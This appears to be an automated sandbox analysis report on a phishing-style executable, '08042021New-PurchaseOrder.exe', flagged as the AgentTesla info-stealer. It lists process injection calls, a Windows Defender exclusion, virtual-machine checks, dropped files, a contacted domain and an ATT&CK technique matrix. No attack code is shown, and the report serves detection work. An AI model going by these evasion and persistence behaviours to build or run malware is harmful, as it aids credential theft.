                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,5_2_0040A272
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Registry Run Keys / Startup Folder1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Logon Script (Mac)Windows Service1Timestomp1NTDSSecurity Software Discovery331Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptProcess Injection11Masquerading1LSA SecretsVirtualization/Sandbox Evasion251SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion251Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 383917 Sample: 08042021New-PurchaseOrder.bat Startdate: 08/04/2021 Architecture: WINDOWS Score: 96 58 Found malware configuration 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 Yara detected AgentTesla 2->62 64 Initial sample is a PE file and has a suspicious name 2->64 7 08042021New-PurchaseOrder.exe 21 7 2->7         started        12 SWqTT.exe 2->12         started        14 SWqTT.exe 2->14         started        process3 dnsIp4 52 myliverpoolnews.cf 172.67.150.212, 443, 49703, 49704 CLOUDFLARENETUS United States 7->52 54 192.168.2.1 unknown unknown 7->54 46 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 7->46 dropped 66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->66 68 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->68 70 Adds a directory exclusion to Windows Defender 7->70 16 08042021New-PurchaseOrder.exe 7->16         started        20 cmd.exe 7->20         started        22 powershell.exe 23 7->22         started        28 3 other processes 7->28 48 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 12->48 dropped 72 Multi AV Scanner detection for dropped file 12->72 74 Hides threads from debuggers 12->74 24 AdvancedRun.exe 12->24         started        50 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 14->50 dropped 26 AdvancedRun.exe 14->26         started        file5 signatures6 process7 file8 42 C:\Users\user\AppData\Roaming\...\SWqTT.exe, PE32 16->42 dropped 44 C:\Users\user\...\SWqTT.exe:Zone.Identifier, ASCII 16->44 dropped 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->56 30 conhost.exe 20->30         started        32 timeout.exe 20->32         started        34 conhost.exe 22->34         started        36 AdvancedRun.exe 24->36         started        38 AdvancedRun.exe 28->38         started        40 conhost.exe 28->40         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      08042021New-PurchaseOrder.exe15%ReversingLabsByteCode-MSIL.Packed.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe15%ReversingLabsByteCode-MSIL.Packed.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      http://www.microsoft.co0%URL Reputationsafe
                      http://www.microsoft.co0%URL Reputationsafe
                      http://www.microsoft.co0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
